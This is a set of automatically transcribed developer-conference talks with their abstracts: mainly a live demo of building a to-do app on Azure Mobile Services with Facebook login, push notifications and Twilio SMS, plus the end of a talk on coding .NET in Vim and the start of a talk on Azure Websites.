IntelliSense Yeah. That's a good point. I was supposed to mention that Omnishop is a plugin for them that would actually provide you with quite a bit of refactoring support and it'll do IntelliSense for you and you'll get a lot of other information and they play fairly well together because they kind of take. They don't conflict with it with each other. You can do the project management stuff and project file management stuff and you can use Omnishop for IntelliSense and all those things. And I would actually recommend any of you who uses Vim to have a look at it because it's quite powerful. Any other questions? And thank you for listening. And if you thought I was a raving lunatic then have some sympathy and put a green note in there. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
As a .NET developer when you write code you write that code in Visual Studio. That has been the De facto standard since the origin of .NET. Does it have to be that way? Today we have alternatives like Monodevelop (Xamarin studio) and Sharpdevelop. For the last two years or so I have been writing all my .NET code in regular text editors like vim and sublime. There are several benefits to working this way. In this talk we will dive into: - How and why you would want to do your work outside of Visual Studio. - The good and the bad of the .NET environment - How this affects the way you write and organize code - Busting some of the myths behind developer productivity
10.5446/50623 (DOI)
All right, let's see if it's working. Woo, we have sound. Fantastic. Right, there's a lot of people here. You actually found your way to Room 6. It was kind of a little maze. It's like a whole way to work out. If you're smart enough to get up here, you can be smart enough to leave if you want now. It's okay. This is Windows Azure Mobile Services. So if you're not ready for this talk or this is not what you're expecting, run. I'm trying to get people out, I swear. My name is Niall Merrigan and I work with Capgemini Norway. And this is actually going to be Azure Mobile Services because Microsoft decided to drop Windows from their Azure branding in a masterful move because everyone associates Windows with Microsoft and Microsoft with not running anything. But Azure actually runs quite a lot of other stuff other than Windows, so they've decided to, that's why they dropped it. It just means that all my slides are now a bit out of date. But if you've got Twitter and the internet and stuff like that, you can tweet me at nmerrigan and use the official NDC asl hashtag. There is a rating system and feedback system for speakers. As a speaker, I'm very narcissistic. I do love when someone tells me I'm good. I don't like when people tell me I'm bad. But I do appreciate that I may not hit all your buttons on the one day. So if there's something wrong, please tell us as speakers in general what is wrong. Because if you don't, it's like sending in, there is a bug. And I will reply back, there is a solution. And you will go, for what? And I'll say, for what you told me was wrong. And they will go, okay. So please, it's green fur, I like you yellow fur, I thought you were okay. And red, I'm not what don't want to be your friend. So it's very simple. If you're colorblind, just pick something up and throw it in. I'm Irish and I live in Ireland, or live in Norway actually. But these are actual Irish road signs. We advise you not to go with the speeding limit. For our international audience, people running at home and stuff like that and whatever. In Norway, the speed limit is about 80. And this scares a lot of Norwegian drivers. Because it's on the wrong side of the road and going up a cliff and you can fall off. However, Norway does like you to enforce the speed limit. So they just put tanks beside their photo boxes. I'm sorry, sir, you're getting two points in your car. Done. I work with Capgemini Norway in Stavanger. I am the head of custom software development there. I am an ASP.Net MVP, ASP insider, member of many developer advisory councils, general, shouty person. And today this is going to be about Azure Mobile Services. Now, back in the old days, when most of us were small and didn't know what a computer was, this was a database. This was our computer. And people generally, if they worked in one language, stayed in one language. If they worked in one technology, they stayed in one technology. Hi, I'm a VB developer. I write forms and line of business applications. Hi, I'm a Silverlight developer. I'm extinct. Hi, I'm a Cobalt developer. Sorry. I try to shove that in. Hi, I'm a Cobalt developer. I'm old. I don't do anything else. That's all I did. I very much focused on one technology, one language, nothing else. Now, we are all multi-platform. We're all about multiple different devices, multiple different technologies. If I asked any developer here, most of you would say, I know one language. I can probably do SQL. I'm learning two others as I'm going along. I'm working on.NET. I'm working with Linux. I'm working with Mac. I work with many different application technologies and platforms. But something that always remains in the background is the very humble database. It is, for a lot of people, it's where they begin their development process. It's a bad way to begin your development process if you begin with your database. But if you want to now share your data across multiple applications, which is a given in today's society, the idea that I would actually have to pick up something off one computer, and carry it to another device or something else, and load it up there is like incomprehensible. How many of you, if I said, sorry, do you want a copy of that code? Okay, will you come over to my computer, put in your USB stick, take it off, copy it over to your other device, and you're like, but why can't you just share it online, or why can't you just share it somewhere else? This idea of me having to physically move from a device to get the data is gone. The problem is, if you have to share all this data, how do you scale up? And how do you share all this data? Do you build your own data center? Do you make your database accessible to all the world? Or do you say, well, you know what, I can deploy a back end in the cloud, or I can just make a back end available? And this is what Azure Mobile Services is. It's your back end in the cloud. This is the product slide for this, and it says, you know, it hasn't been updated yet, but it's all about the data. You can store data in the cloud that can be shared across multiple devices. It also gives you push notifications. Now, notifications have become the de facto way of telling people or something you have to do with your application. We don't expect customers to actually open up our app, refresh to see if something happened, and then close the app. Customers like to be notified. Hi, you've got something you need to look at. Please look at it. Okay, we're gone beyond the idea of, I'll just go check my mail to see if I have mail. It's like, I expect a notification, I expect a buzz, I expect something to tell me that there's something for me to look at. Notifications are a standard now that you have to use in any mobile device. And now, for example, in other applications such as Windows 8, you have push notifications based on the desktop. We've seen it in browser for a long time, but now it's becoming in the application on the desktop as well. We now also think of authorization and authentication. Do you like remembering passwords and usernames? How many of you do? Anyone's? No? No one likes to remember using it. How many of you say, okay, sign up with Facebook or Google or Hotmail or whatever, and go, okay, great, click the button, done. One less thing I have to remember. Sorry, is that something I like doing? I do, sorry. Troy Hunt is here. He's a security guy, so if you're going to see his talk, he'll have a lot more of these fun questions. You've got server logic. We've gone beyond the idea of putting code on the front end that cannot be shared, and any time I have to do an update, I have to put an update to my application. We had for a long time, end tier applications where business logic stayed in the middle tier and data logic stayed in the bottom tier, and then you had front end just visualization. The exact same thing happens here. I want to store stuff that is common to all my devices and all my platforms in the one place. If I need to change it, I update it once. I don't need to update my application. Why do I want to do that? You've diagnostics, you've logging and scale. Right. I think we should start and show you how it works. We'll just start with a little demo. This is how I think these demos work. Let's do it. Welcome to the Azure portal. How many of you have seen the Azure portal? Everyone? Actually, first off, question. How many of you know what the cloud is? How many of you don't know what the cloud is? Good. Because I would say if you want to see the cloud, just look outside. It's wet. If you want to create, it's very simple, login with your LiveID, create a new, very simple mobile service, click create. We are going to create a URL which I'm going to call ndcauslowv2. I have a v1 just in case everything goes tits up on this because it did before. Use a new database. You get 20 megs free. Database all exists for Azure. Okay, using existing database. West US, I think I'll go for North Europe. You can actually use either JavaScript or.NET preview. Personally, I prefer the JavaScript version. The.NET is kind of web API stuff I'm built in. I don't know. I think when I'm doing mobile services, because it started off in JavaScript, it's just a bit more easy and it kind of sits that fluid way of working. I'm thinking that's what we should be using. I'm just going to just do... You must follow by a SQL password. Okay. We might just use any creating a SQL instance just in place. It might be just easier. ndb, configure server, North Europe. Now... And we click OK and we provision. So we wait a little bit longer. Following mobile services is not created. Database percentages are incorrect because firewalls are... Fantastic. Right, we're going with the one that I've created before, just in case. I honestly think that this has the demo gods of going, we will smite you. Smite you hard. I didn't say everyone starts with a hello world. I know I'm sorry. I didn't start with a hello world. All right, let's do this. And we'll bring up Visual Studio and I'll have my ndc-osl app. Okay. You can actually download an existing create new store app and just create... And just download this. And it will download a very sample app which we're going to use because it's nice and simple, open folder. One thing is if you download it, remember to unblock it because otherwise it will tell you you have to do that for everything. And it becomes quite annoying. Now we wait 15 hours for Visual Studio to load. Woohoo! It decided it would wake up today. I spoke too soon. I spoke too soon. Oh, God, come on. Hello? There we go. ndc-osl unavailable. Why could you not... That's probably because I'm reading this. We'll go into Server Explorer and inside here we can see in the tooling, I can see the mobile services that I have existing already. Now it's going to tell me I need to put in my password. Or I hope not, maybe not. I can see that I have an ndc-osl application written here. If I go back to my mobile services, as you can see it maps up to the two ones I have here. It's very simple to see all this. In ndc-osl, this is my dashboard. And it shows me as my mobile service what's actually happening. I've got a mobile service URL. It's running on HTTPS ndc-osl azuremobile.net. And I've got a database against ndc-osl db. I can see my data. I've got an API, custom API. I've got a scheduler, push, identity, logs, etc. What I'm going to do here, if I can see if this will work for me, we are just going to, I just have to rebuild this quickly. Actually we'll just press F5, it will be fine. If we press F5, and we wait, wait some more. Activation requests this error because the screen resolution is before. This is just fun. Screen resolution. It's 1280 by 720. Alright. Turn it to 11. Okay. Can everyone still see the screen? We're all good. Excellent. I bet you it's, no, we're okay. Registration successful. This is for push notifications. So when I insert it to do item, I click save. It should save this out. Okay. No reference exception. I'm sorry. I know it's like, sorry. I'm not having a good day today, am I? Alright, one second. Yes. The problem with the screens as well. It's like an etch-a-sketch. The problem with screens, let me just... Sorry, the joke was it's like an etch-a-sketch up here, so they're just going to flash the screens. Are we still good? No? We're not good? Alright, let's do a screen resolution down again. 1336 by 768. Apply changes. Is that all there? Alright. Let's see what's going on. Okay, we'd have to go back and see what actually the mobile service is doing when we look at our database in order to do item in our script. So we have an sent to script, and we'll do that. Okay. Refresh to do items. Let's just see what's going on. Refresh to do items. So if we go at five, it says invalid in there, so that'll be fine. But I'm going to open up the... Close this. Close that. We'll bring up the other one. And see if that'll work for me. Oh, the demo gods, they are fun. So while I'm burning here on stage... Yeah. Ha ha ha. Oh, there's always one funny Englishman in the back, isn't there? So if we go back to... Where's my v2 vision of that? Alright. At least my son is still smiling. At least my son is still smiling. That's right. That's... Distract all. Okay. Let's see if this will work. Close that. I'm sorry about this. This is always the mobile services talk. It works fine. It works on my machine, TM. I should actually just record this the whole thing and just say it actually does work. Well, while I'm here, we'll talk about it a bit more. In our side art to do item here on our table, we have a database that actually supports dynamic data. So what you can do is it has a dynamic schema enabled. This here means that as I build my application, you don't actually have to define what the table contains. I can actually say, please just use whatever object I'm sending in and build the schema accordingly on the database. So for example, say I have my to-do item here. If it will show me, let's see. Excellent. If we go back to main page, yes. We have a to-do item here, which has got ID, text, and complete. It's got JSON property. Should pick it up. Come on. And as we use this, and I'd say actually what's happening here is it just needs to get the package manager, tools. You get package manager and restore. Oops, sorry. Tools. You get package manager, restore these. So what will happen is that it will build. We should be just closing this. I'm finished. Great. Done. Now, have we got this? Can it resolve symbol? Oh, fantastic. So what it will do is it will put in the ID, text, and complete. If we go back to our mobile services here in... Did it bring up V2? Mobile services? Oh, yeah, because it didn't create the NDC also. So there we go. In our data, when I create a to-do item, it actually generates in the columns. It'll show me that it will generate the text, and complete an ID parts by actually adding those in. So... Why is this not picking up? Yeah, I'll try to build. Just to make sure for build. It's all started. Should pick it up fairly quickly. Build succeeded. Lovely. We're still giving... There we go. Thank God. Something actually works today. So if we look here, as it creates... When it creates the sample item, you actually create a new mobile services collection. It creates against the to-do item table, which just gets a get table to-do item. So it maps up against the get table. It will then says, I want to wait, insert async to-do item, and then just click add. It sends that up to the browser, and what are up to the mobile service? The mobile service will receive that for the insert command, and say, okay, what do I want to do with this request? I want to do a database. Right. I've got a number of different properties I don't recognize, but they're JSON serialized, and so I can... Because I've got dynamic schema enabled, I will just expand my schemas to actually match those object types. And that's all it has to do. So if I press F5, this should actually connect up to the other one. If we're working. See, there we go. We've got to refresh our data so far, so good. Sample item, insert. If we click save. Okay, so it just sends me back a push notification, because I've enabled it for push, and down here, sample item is inserted. Now, if we were to change that actual command to insert a new item into-do, it would actually expand the table, and we'll do that in a minute when we're going to do enable authentication. This is a very simple to-do item, but it shows you that I can save data up to the cloud and send it back. If I then put it into, for example, a mobile device, and I connect up to the exact same table, that device will have the same data, because it'll have the application key. If I go over to the server explorer here, and back in, I can... If I go into mobile services... A bit more, and I go to ANDC Oslo. We have our to-do item, which I can expand here, and I can actually see that on the insert, I can see the actual code that I'm writing against it. Now, this particular piece of code, it says, I want... When you insert, I want to send a response that I've inserted, but I also then want to send a notification, which uses notification hubs to push a notification back to all connected clients, and I'll explain that in a second. Now, if I want to add authentication, to do this, I would actually have to go into Facebook... Like, for example, if I want to add Facebook authentication, if we go back and explain a little bit about this. On Facebook authentication, you need to set up a developer account on Facebook. So that goes to developers.facebook.com, register yourself as a developer, and then you will be given this effectable dashboard for here. Very simple. I've created a demo account here. I create apps, create a new app, and this will come up with a display name, and you have to use a unique identifier here. Just note, it has to be lowercase for this, and then just choose a category and create the application. Once the application has been created like here, you then add a new platform for it. So that goes into settings, click Add a Platform, put in your site URL to your mobile device, or your mobile services, go back... Once you have that, into dashboard again, you go back and forth a little bit, I'd love this to be a bit simpler, copy out the app ID and the app secrets, go into mobile services... Hello, mobile services, yes, thank you. And we go into identity. And here, I can put in my different authentication schemes. So I have my app ID and my app secret. You can add Twitter. The thing with Twitter is that if you're doing this against local hosted, it will fail. So it's a valid, actual account that will do it. What I recommend if you're trying to test locally against with Twitter authentication against mobile services is instead of using local host, use a domain name that is just you have in your host file. So it will just map like example.com, and you say example.com. Yes, you can copy the key and I will look at it in a minute. It's fine. Sorry, the security guy here is just making jokes. It's not funny. It's bad enough up here as it is. So with Google and also with the Windows Azure Active Directory, and you have the Microsoft Live ID if you wish to use that. So once that's done, to enable security on your application, you click on permissions. And right now, it says the insert permission is anyone with the application key. So if I've got the application key to this application, you can use it. A word of note, the application key here is kind of sounds like it's a security token. If you're using authenticated login, if you just want to use login, use your mobile services to do your login, or OAuth login, the application key is actually not required. So because the actual JavaScript involved in this doesn't actually respect the authentication key. So any application can use your mobile service to OAuth. Now, it's, well, it's just, it's no big deal, but it means that you'll end up with a whole lot of service calls, and it could, you end up with possibly an idle service attack, whatever. Yeah, it's one of those things that I kind of found a bit weird that it didn't allow you to do that. So with the read permission, I'm just going to change it to only authenticated users, so it'll actually force the application to be authenticated at the start. Now for the application, it will be, to do the insert, you will need to have an authenticated token. We click wait for permissions. Good chance to get a glass of water. Have there been any questions so far? Anything at all? This is kind of weird. It's a real long, yes, sir? If you're more than one developer working on mobile services, how can you connect? If you're more than one developer working on mobile application services, how can you connect as in? So to this interface, I want to share with somebody else. So more than one developer or a team? Yes, and you want to use the actual, not this interface, like for example, you can use Visual Studio if you wish, but the thing is if it's a shared account, it'll have to be like a company account, which would mean that when you connect up here and use server explorer, and you say connect to Azure, you connect to Windows Azure, you actually, I'm currently selling this as my actual live account, but if I had an actual corporate account or something that was shared, you could actually use that in that case. Yeah, it's a cost issue, of course, but the thing is if you have a corporate account, in other words, this can all be server free, but say for example, you have a shared email address, mycompanyatlive.com or outlook.com, and say 20 developers have the password for it, they can all connect. It's not going to say that it has to be just one developer. In other words, I can have this running on four machines side by side, and it's not going to worry that, but you'll have concurrency problems if for example, someone changes something and it's code. It does support Git on this, so if you want to do actual changes and push back and forth, you can actually do that instead, and actually develop locally, push up to Azure and it'll work. So good question to answer is you have to have a shared email address that people will use. So to go back to our authentication, we should have now been authenticated. We've done, all right, excellent. So if I go into NDC also again, and I go back to my solution and main page. To actually authenticate, I need to insert my snippet, which is add a mobile service user to tell it that I want to have something that I can store the user credentials against and authenticate async. So I added a new function called authenticate async. And what this does is you see here, it says, await app.mobileservice.loginasync, mobile service authentication provider.facebook. So it will use.facebook. And if you, sorry,.facebook, it will use Facebook. So you have the option here of.facebook, Twitter, Microsoft account, and Windows Azure Active Directory. So we'll go back to Facebook. Excellent. And then to do that, we will have to tell it that on the, when the, where is it going down here? Back down here, refresh to do items on navigator two. It will be await authenticate async. And that will give an error because I need to put override async void. Now, press F5. We pray to the demo gods a little bit. Again. We hey. So it will come up with my connecting to service. Come on. There it is. As you notice, I'm using a very nice effective hidden domain thing called opaque. I actually really love this domain name opaque for those who actually speak English. It's quite funny, but those who don't, it's going to, huh? And I'll keep me logged in. I'll log in. Now you're logged in as Facebook user X. So it will now authenticate, it's now I've actually authenticated against my mobile service in what can be considered a couple of different clicks and running around. But that's it done. There are the easy bits. What we're going to talk a little bit more about now, if we go to Homer, we have our hammer time, active directory. We're going to talk a bit more about push notifications. Push notifications have come a hell of a long way. Right now you have Windows notification services, Windows phone notification services, Google Cloud messaging, Apple push notification services. And if you want to push to all different devices, you kind of have to kind of know how to send different posts and tiles to those particular devices. It seems like a lot of work. As a developer, I like stuff being easy. I like stuff being wrapped up a little bit that I can just say, make it work. I'm happy. That is where notification hubs come in. They are now in preview right now, but what they allow you to do is, hi, I want to send a message to everybody. Great. Who do you want to send it to? Well, all connected devices. You fix? It goes, I fix and just sends it out. It'll do a simple push notification to all devices that, regardless of device type or push notification service you need, it will just send. However, you can actually override it and say, okay, I want you to, for Windows notification services, I want you to send this type of posts and tile to it. No problem. I can do that. So we want to show you how that actually works. When you, to enable push notifications, normally what you will do is you'll right click on your application up here and just go to, where's it at? And you have a push notification and it will enable push notifications on your application. It takes a couple of minutes, but what will happen? It will ask you to register a namespace and an actual application name. So when you go into Twitter, go away, maybe go away, sorry, we'll bring this back up, you have a dev center for Windows. And when you log into this, keep me signed in, this will register your application against the dev center and it'll give you an application name. So for example, here, I have NDC Oslo. When I go to click on edit this, this will show me the different, this does it automatically for you. As enabling push notifications gives you, as far as number five, this piece done, it gives you your app name, reserves it, and then says it enables push notification services on your application. So it sends this client application secret back to you. When you go into your live services site here, again, this is the thing, it kind of wraps, enabling push notifications on mobile services wraps this up a little bit easier for you so you don't have to worry as much about doing all this stuff. Before, it was a manual process of sign up to the dev center, sign up to live services, this just enables it. But it gives you your application identity, your client ID, and your client secret. And these are all built back into the push notification service here. I'm going to show this. It automatically pre-populates those back into your application. But this is a subset of the Azure service bus. So when we go into the NDC Oslo hub, I can see my notification hub here, which is directly linked back to my mobile service. So that's what it provisions. It provisions an Azure service bus, which provisions internally in that, an actual notification hub. This allows you to send your push notifications to any connected device. What happens, how does your device actually receive notifications? It simply says, when I connect to your service, I'm going to register a channel URI. Great. And then our application holds that, and we'll use that for sending information back. You do this every time you actually register your device against your mobile service. So in our application, I'm going to take out my await here, because I really don't want to have to log in every five seconds. And I'm going to go into app.sammal. And I'm going to enable push notifications. I'll just add it here. So if I add push notifications, it does this, sign up windows, sign into windows store. And we have to go here. Yes, I don't know my own passwords for stuff anymore. Text it, okay. What could possibly go wrong with two-factor authentication? I feel like it's like the guy who has to open all the locks and you hear, ch-ch-ch-ch. Submit. Yay! So I've got NDC Oslo here, and it'll do that and click next. It'll look it up to a different subscription, which I already have. And I'll say NDC Oslo, next. Finish. Temptons to all windows Azure and mobile services. This takes a little bit of time. Okay, any of the push notifications services. Done. And done. So that's it done. We have our function set up that will notify all users and send an SMS. Excellent. Fantastic. Okay, so that's enabling push notifications on the server. Now we have to enable it in our application. So that's quite simple. Go in here. And we set up a new function. Thanks. And do micro snippets and initialize async down here. Yes, there we go. I forgot how to do this before, so love mom, thank you mom. Package manager is off. Yeah, there we go. It should have just done it already. And just paste. And then you can't solve. Paste. Hello. Install package. Come on. There we go. Remember when I said this thing is reliable. For all definitions. Messaging. Dodd managed. Oh, great. Fine, fine, fine, fine. It's just not funny. Oh, no, it is. Trust me, it's hilarious. It's hilarious, isn't it? All right, fine, fine, fine, fine. Why are we not doing this? Now you do that. And so in the application app, okay, yes. Create a new class notification app. No, I want to install the package. Install package. Microsoft. Azure. Windows Azure. No, not activities. Azure.Messaging.Managed. Why is it not giving me this? Yeah, I thought so. But that's why it just says install. It should install the package for me. So install this. Oh, I love you. What the hell? Yeah, I'm going to just search for it and we'll find out. And then we get a package manager. Don't need messaging. Messaging.Managed.Installed. There we go. Yes, I accept. Was that so hard? Oh, thank God. I love it. So we need to init then in, and I just removed this. I'm going to say init notifications async. Okay, f5 that. Messaging was not handled in user code. What the hell? Oh, yeah, that's because I forgot to end up with the endpoints. I know that would help. Well done, now. Okay, so that explains my next point, what you actually should do when you want to set this up. You manage the connection information. So the hub is called entity Oslo hub, and we want to use that here. And then we want to listen endpoint, which is just going to be here. And do that and put that in over here. I think it'll just, I think it's, yeah, I probably just, oh yeah, I've got extra codes there. Thank you. I'll go back here to this. All right, f5 this now. This is actually a great way to show you how not to develop. Don't ever come up and try and do live coding. Error loading items. Access is denied. Of course access denied because I forgot to take off the identity. So this is the really how you do the development environments kind of thing. It's like it actually shows you how to debug. So, yeah, that's how most of us do it as well. Yeah, that worked. Did any of you see Anthony's talk on solid for CSS? He was talking about spaghetti code in JavaScript. And I was thinking of saying, well, mostly spaghetti code in JavaScript happens because it works. Don't touch it. We're not going to, I don't know what actually why it works now, but it does work. And I don't want to stop permissions. So we'll just take that from any of the application key and any of the application key and click save. All right, so 20 minutes. We're fine. I'm going to go on and talk about disaster recovery, but it'll be kind of interesting because it's. Yes, go on, recover. Yes, registration successful. So when I send this information here, come on. Save. It should send me a notification. So there it goes. Now, that is a very simple notification. What I've done here is when it inserts, I have changed the code on the insert script to say the following, send notifications. It uses Azure require. So this is no JS and just as require Azure. You say, not create notification hub service. I've put in my endpoints that I've required the exact same thing. The hub and the endpoint and then said, just send WNS, send toast text to do this. Yeah, that's okay. We can, but we can actually use the custom API to test this as well in we have logs or is it no, it's in configure, I think. I'll show you in a sec. The where's it API. I've got a notify all users here, which will allow me to do a test notification if I want and then pushes and that'll allow you to if you run it, you'll actually send a notification to it. But to test it, what you actually can do is go into your hub and you're going to notification hubs. And you can click debug and you can do a random broadcast and you can send it to, for example, windows. And I can select notification type, just a tile and it'll give me some test message here. Or I can say I just do that and it'll just click send. Do you want to, yes. So it should actually broadcast to this device here. I hope all random devices may not. Yes. So let's try and do a send and send test message. Send. Send to us notification. And probably now what will happen is I'll get about four notifications in one go because notifications are best effort. They're not actually fully reliable, which is a bit of annoying thing. But if I want to do random broadcast, send a tag, it'll just send it down. What push notifications you can do further on is if we go to our back to our mobile service again. And go into our API. We can, for example, send a notification hubs here to this. Now if I bring up my notification hubs here. See if I've got this. Hello from mobile services. Scheduled up. Yes, I have a sample notification. If I go into my scheduler, I've got a sample push set up here in the script. And what this uses is a more advanced version of the hub. It's still the same hub, but it allows me to send, for example, here, send toast image in tech 01. So it'll actually allow me to send a run once. And I get a hello for NDC also, complete with badge, et cetera, and the whole lot. So I can actually send to specific. This will use the Microsoft or Windows notification services and uses image one SRC, which is on my CDN, and allows me to then actually send a push notification onwards. So this is where I can say I can send generic if I was to use, for example, here, my alternative is with notifications hub service dot send null, send all devices, message, this will be pushed irrespective of platform. So what will happen if we use this one and said was that if it was an iOS device, it would receive it. The one up here would not send to iOS because it would not support it. So you'd have to use notification service dot APNs dot send toast. And then you can actually send to the specific one and then you can actually put in the correct different attributes that you require for an iOS device. And it would say just broadcast to all connected iOS devices do the following. Notification also hubs also support tags whereby I want to sign up for a specific function or like, for example, news broadcasts. Send me like if we look at Twitter, I only want to send notifications of DMs and actual interactions. I don't want to be sending notifications up for every actual tweet. You can actually say, OK, subscribe to that. And then you can get your application to say, OK, you have this broadcast of this. If you have this broadcast of that, it will send to the person who has registered with that particular tag and broadcast to that particular device. You can then suggest that if I want to use APNs or Google Cloud Messaging, I can do that. Now that is push notifications. As you can see, it's written if you just use var azure is require Azure and then you will get the notification hub service up here. It'll work from that. Right. OK, so it's been recovered, recovered, recovered a bit more and we'll see what else we can do. This is where I was there. I hope to God this works because it fails so many times that it's just yeah. If you're going to scale your application, what happens when things go viral? How do you react? You have developed the new flappy bird, flappy bird, as we all know, the very addictive game. Your application has been picked up by 100 people on the first day. That's fine. My servers can handle it. It's now been picked up by a million people the next morning. It's now been picked up by 100 million the next afternoon. How do you scale from 100 people to 100 million people in 24 hours without using the likes of the power of the cloud? What the application, what mobile services does is it provides you with a back end that will actually expand if you need it. We are all hunting when we design applications for the application that will generate enough cash. But if we can't keep up with the demand of it, it will fail. If your users cannot connect to the device or cannot connect to the service and it keeps timing out, it will be people who are fickle, 15 minute attention span, it's gone. However, if your application is going superbly well and people can still access it, it generates viral word of mouth and continues on. The more you expand, the more the Azure application can expand with you. So if we were to look at how to scale, it's quite simple. It comes under the mobile services again and you just click scale. And you can expand out onto different, on the free tier, you get like 500,000 calls and up onto the standard tier, you get 15 million calls per device up to a certain amount of units. You can also say I want to move all these units and expand my application to react with it. As we know, cloud, one of the selling points of cloud is actually elasticity of the service. In other words, I will only, when I expand and I use all my current resources, I expand more. And if I don't need those resources, I just return them back. So the elastic version of this, it can be used. This is why I'm saying, if you have a back end that actually needs to scale very quickly, you can do this. Right now out of the box, you get 20 megs for free. But if you need more data, you've got to, of course, get into a different SQL server for that. Right. I'm going to talk a little bit about disaster recovery because I think that it's actually something we should talk about and custom API. The custom API allows you to see, and you see also mobile services. Right. First off, custom API here. Allows you to create endpoints that can be run over, get or post on rest. So in this case, where I've ascended SMS, I've send permissions to, I can say get permissions. Anyone with the actual can do a get request and it will send an SMS. Or I can say anyone with an application key, only authenticated users, for example, things like that. What I've done is I've set up an integration with Twilio. Has anyone know how to pronounce that? Twilio. Sorry, guys. And in Kudu, which is the back end for Azure Mobile Services and all the back end for websites, you can install Twilio support using MPM installed Twilio. And that will actually allow you then to generate against the Twilio service. Have you all seen Twilio? It allows you to generate SMS and call voice programmatically. So for example, you want to implement a service whereby I want to note, I know I'm going to send push notifications, but I want to send SMS, for example, I want to provide a service where I'm going to send SMS to my users as well. So I can say, okay, on this, do the following. But on Azure Mobile Services, what you do is you install Twilio, install against the API permissions, just give it whatever ones you want. And then your script here is I'm going to exports.get. So for the get protocol, I'm going to create a new Twilio REST client, and I'm going to send an SMS from this to myself. And that's it. So to do that, it's then ndcausler. For slash API. Send SMS. And yes, no. So this will just open and say it's null and it should. And it actually has sent me a text message quite happily. But it also explains how we're going to do logging. Because when we go back in here, it'll say console error success, success, the seed for this SMS is the following. So when I go back into my logs, I can actually see the information message was sent on this day and the six seed for this was, I can send notifications were successful. This is my logging function. We recommend that you only log errors, don't log warnings, don't log information because logs fill up very quickly and you have to truncate them every so often. Very simple, but the idea that you can export this log back out and read it using like, so, for OCO or new relic, or sorry, use it using new relic to keep an eye on your application means the integration goes much simpler. Back here with Kudu. Kudu is the back end. You can actually just see the what's actually running app settings, for example. It's much easier if I do it in Chrome because I got a JSON viewer there. Okay. Any questions while I'm waiting for this? Done so far? Yes, sir? Do notifications work with websites? Do notifications work with websites? Yes, I think you can actually send to, can you do push notifications? You can do push notifications. You can do push notifications to HTML5, I think, as far as I understand. If you have a website, can you make it to Azure website back? Can you show Azure authentication to all the pages? Oh, yes, yes, you can. Very good question. Can you use an application to do this? Yes, you can because, for example, if you use the custom API, for example, I can create an endpoint with like, say, post request. And I have a mobile services client with the authentication token. And what you do is you say post, do this and send this value in your application and we'll receive that data and then push all connected devices for you. So it's just running over rest. So it's quite simple that way. So if we look at the app settings here, we can actually see what is behind this with, like, it gives you of all the whole thing. So if it's available, like, this is a don't let this out in the world. Right. We're nearing the end of things. So showing the custom API. Yeah, this was where I was talking to one of the guys and he says like he did it with Twilo. Just be careful that it's again, not fully reliable delivery on the free account. So if you are using this type of thing, make sure you have a paid account to do it. Right. Whoops, wrong place. Close time. If you are continuing your Azure learning journey, please catch Nick Mollner's talk on Azure websites. It directly links into this a bit because it's running on the same kind of platform and you'll be able to integrate against mobile services for it. Also, try and get up and see Troy Hunt's talk. It's in Room 7 today. This is, you've learned how to do mobile services, learn how to secure your web applications while you're doing it. Because if you are integrating with anything like that, all this type of stuff needs to kind of, you have to think securely about it. Now, you should really go off and start creating applications because it's quite, as I've probably not quite effectively shown it's easy, but I'm sorry about that. It is actually kind of one of those things that as you get into it becomes much simpler and it takes away a lot of the pain points that we would have had as developers. For example, how to do notification services, how to integrate our databases into an application and share it across all devices. How to actually have a dynamic and build your front-end and just say, okay, get your database to just look the way it needs to do and in the back. Any more questions? Anything else? Going once, going twice, gone. Thank you very much. Thank you.
This session is geared at giving a comprehensive overview of Windows Azure Mobile Services and how you can use it in your apps. We will look quickly at the services before diving in an building an application that uses it.
10.5446/50624 (DOI)
Alright. Good afternoon everybody. Welcome to room number one. Azure website secrets exposed. My name is Nick Molnar. I'm from New York City. I decided to do something really smart yesterday. I got a horrible cold, so I'm not usually as sultry as this and I've been relying on cough drops to get through the day. It's okay though because I met some people on the internet here in Oslo and they gave me pills that I have labeling that I don't understand because it's not in my language, but they tell me that it should make me feel better and so far so good. But if I kind of like float away, you'll know why. I've been a web developer for a little over 15 years now. I created an open source project with my buddy Anthony called Glimpse that you may or may not have heard of. How many people have heard of or seen Glimpse? Okay, cool. Good number of you. That's great. We won't be talking about that at all today. And then the Glimpse project was sponsored by a company named Redgate that's based in England. So due to their sponsorship, I get to work on open source my baby full time in addition to go and get to speak to great developers like you at conferences around the world. I have become, I've been honored to become an MVP for ASP.net and I'm also an Azure insider. And Azure has become something that's a little bit more part of my world as my day-to-day progresses because even though I see myself as a web developer, I was always kind of the software guy. I would let somebody else go into the closet in the back of the office and they were the ones, they were the server guy. They set up IIS for me, they set up SQL server for me. I never really dealt with that. And then the whole DevOps movement started and I sometimes I'll dabble into DevOps but I feel myself firmly being the dev part of DevOps. And Azure, particularly Azure websites has begun to change the way that I think about myself as being just a developer and becoming a little bit more of a dev op. So if you have any questions after the conference or just want to chat and be online with me, I tweet at nickmd23. So Azure, Azure is huge. It's this monolithic universal thing that we have applied one word which until a few years ago was just a color to me. Azure, as my coworkers like to pronounce it. I know lots of people who are MVPs in Azure and they know lots about different subsections of Azure but I've not met anybody who knows everything about everything. It's just too large now. You can't kind of get a grasp on the whole thing. So what I've decided to do is focus particularly on Azure websites and with that in this talk, I want to really dig into some of the nooks and crannies. Some of the things that maybe aren't as visible to you if you've watched other talks or you play around on the portal. So just a quick show of hands. How many people here have actually deployed an Azure website before? Okay, great. And I'm assuming the rest of you are interested in this technology and that's great. So Azure websites actually aren't that special. At the end of the day, it's infrastructure that you may know. I never knew because I let the guy deal with it in the closet at the end of the hall. I let the ops guy deal with it. But I've been forced to kind of think about it a little bit more. So for those of you who haven't seen it, let me jump in really quick and show you what I'm talking about with Azure websites. So Microsoft Azure, basically everything you do starts in the portal. The portal is this place where you can make new websites, make new databases, make new whatever the thing is that you're trying to create and monitor them and configure them, etc. So this is the new, brand new Microsoft portal. It's in preview. It's at a different URL than maybe you're used to going to. It's at portal.azure.com. And it's pretty fancy. You can click in here and it has nice little alien graphics. It has this concept of things called blades. I can click on this tour and you'll see this new blade pop up and as I work it kind of continues to work horizontally. But here's the problem with preview. It's beta software and it's really slow right now. That's my opinion. And so to save a bunch of time for everybody because it takes much longer to do this talk in the preview portal, I'm going to switch over to the old portal which you may have seen before and that looks like this. So I'm going to really quickly create a website for those of you who haven't seen it and then we're going to dig into some new stuff. So this is actually my personal account or I'm running a couple of different websites that I work on on the side. The Glimpse website is an Azure website as well but it's on a different subscription so you're not seeing it here. But I have a site that I call signatory.io which is for managing contributor license 